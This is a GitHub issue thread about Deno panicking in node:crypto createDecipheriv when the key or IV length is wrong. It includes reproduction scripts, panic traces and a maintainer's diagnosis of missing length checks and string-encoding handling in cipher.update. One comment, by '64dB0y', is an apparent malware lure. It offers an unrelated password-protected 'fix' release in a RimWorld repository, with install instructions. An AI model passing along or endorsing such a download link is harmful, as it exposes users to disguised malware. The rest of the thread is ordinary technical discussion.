### ISSUE TITLE
Deno crashes at `createDecipheriv`

### ISSUE THREAD

**Issue by silverbucket** [denoland/deno#25279]
Version: Deno 1.45.5

```bash
$ deno run crypto-crash.ts

============================================================
Deno has panicked. This is a bug in Deno. Please report this
at https://github.com/denoland/deno/issues/new.
If you can reliably reproduce this panic, include the
reproduction steps and re-run with the RUST_BACKTRACE=1 env
var set and include the backtrace in your report.

Platform: macos aarch64
Version: 1.45.5
Args: ["deno", "run", "crypto-crash.ts"]

thread 'main' panicked at /Users/brew/Library/Caches/Homebrew/cargo_cache/registry/src/index.crates.io-6f17d22bba15001f/generic-array-0.14.7/src/lib.rs:572:9:
assertion `left == right` failed
  left: 11
 right: 32
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
```

```ts
import { NonEmptyArray } from "https://deno.land/x/fun@v2.0.0/array.ts";
import { Buffer } from "node:buffer";
import { createDecipheriv } from "node:crypto";
import { string } from "https://deno.land/x/fun@v2.0.0/mod.ts";

const ALGORITHM = "aes-256-cbc";
const split = string.split(":");

function decrypt(text: string, secret: string) {
    const pieces: NonEmptyArray<string> = split(text);
    const firstElement = pieces[0];
    const restElements = pieces.slice(1, pieces.length);
    const iv = Buffer.from(firstElement, "hex");
    const encryptedText = Buffer.from(restElements.join(":"), "hex");
    const decipher = createDecipheriv(ALGORITHM, Buffer.from(secret), iv);
    let decrypted = decipher.update(encryptedText);
    decrypted = Buffer.concat([decrypted, decipher.final()]);
    return JSON.parse(decrypted.toString());
}

decrypt("foo:bar", "secretsauce");
```

The crash is at line:
`const encryptedText = Buffer.from(restElements.join(":"), "hex");`

**Comment by silverbucket** [comment]
I haven't hide time to track down why, but when I run some tests against this same method, I get a different crash, later in the method:
```bash
============================================================
Deno has panicked. This is a bug in Deno. Please report this
at https://github.com/denoland/deno/issues/new.
If you can reliably reproduce this panic, include the
reproduction steps and re-run with the RUST_BACKTRACE=1 env
var set and include the backtrace in your report.

Platform: macos aarch64
Version: 1.45.5
Args: ["/opt/homebrew/bin/deno", "test", "--fail-fast", "--coverage", "--clean", "--allow-env", "--allow-read", "src/index.test.ts"]

thread 'tokio-runtime-worker' panicked at ext/node/ops/crypto/cipher.rs:399:9:
assertion failed: input.len() == 16
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
```

The crash is at line:
`decrypted = Buffer.concat([decrypted, decipher.final()]);`

**Comment by silverbucket** [comment]
With the original issue, the problem seems to be using a secret that is 11 chars long, not the expected 32 chars.
```bash
...
assertion `left == right` failed
  left: 11
 right: 32
...
```

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kt3k** [comment]
Encrypting part looks wrong in Deno. The below snippet:

```js
import { Buffer } from "node:buffer";
import { createCipheriv, createDecipheriv } from "node:crypto";

const secret = Buffer.from("a test secret.. that is 16 x 2..");
const iv = Buffer.from("e75f3621f41df73a47efa67cac1053bd", "hex");

const cipher = createCipheriv("aes-256-cbc", secret, iv);
const x = Buffer.concat([cipher.update("foo bar baz"), cipher.final()]);
console.log(x.toString("hex"));

const decipher = createDecipheriv("aes-256-cbc", secret, iv);
const y = Buffer.concat([decipher.update(Buffer.from("bc3b393dafcd0d45ee7b6cce7a4b1fb0", "hex")), decipher.final()]);
console.log(y.toString());
```

executes in Node and Deno like the below:

```
$ node c.mjs
5c2f0a9ac809c2e585ca97a879cac090
"foo bar baz"
$ deno c.mjs 
4c63f944d72f04879998b99daaf473de
"foo bar baz"
```

Also we miss the length check of key and iv. That causes the panic. We should throw RangeError and TypeError for invalid length of those.

**Comment by kt3k** [comment]
I think I found the cause of the error. It looks like `cipher.update()`/`decipher.update()` can't handle "string" input correctly when the input encoding (the 2nd argument) is not specified. If I specify the 2nd argument of `.update()` method to 'utf-8' like the below, the given example correctly deciphers the original text:

```ts
import { NonEmptyArray } from "https://deno.land/x/fun@v2.0.0/array.ts";
import { Buffer } from "node:buffer";
import { createCipheriv, createDecipheriv, randomBytes } from "node:crypto";
import { string } from "https://deno.land/x/fun@v2.0.0/mod.ts";

const ALGORITHM = "aes-256-cbc";
const IV_LENGTH = 16; // For AES, this is always 16
const split = string.split(":");

const secret = "a test secret.. that is 16 x 2..";

function ensureSecret(secret: string) {
    if (secret.length !== 32) {
        throw new Error(
            "secret must be a 32 char string, length: " + secret.length,
        );
    }
}

function encrypt(json: string, secret: string): string {
    ensureSecret(secret);
    const iv = randomBytes(IV_LENGTH);
    const cipher = createCipheriv(ALGORITHM, Buffer.from(secret), iv);
    let encrypted = cipher.update(JSON.stringify(json));
    encrypted = Buffer.concat([encrypted, cipher.final()]);
    return iv.toString("hex") + ":" + encrypted.toString("hex");
}

function decrypt(encryptedString: string, secret: string): string {
    ensureSecret(secret);
    const pieces: NonEmptyArray<string> = split(encryptedString);
    const firstElement = pieces[0];
    const restElements = pieces.slice(1);
    const iv = Buffer.from(firstElement, "hex");
    const encryptedText = Buffer.from(restElements.join(":"), "hex");
    const decipher = createDecipheriv(ALGORITHM, Buffer.from(secret), iv);
    let decrypted = decipher.update(encryptedText);
    decrypted = Buffer.concat([decrypted, decipher.final()]);
    return decrypted.toString();
}

const encString = encrypt("foo bar baz", secret);
console.log("decrypted: ", decrypt(encString, secret));
```

This executes like:
```shellsession
$ deno example.ts
decrypted:  "foo bar baz"
```

I'll work on the fix soon
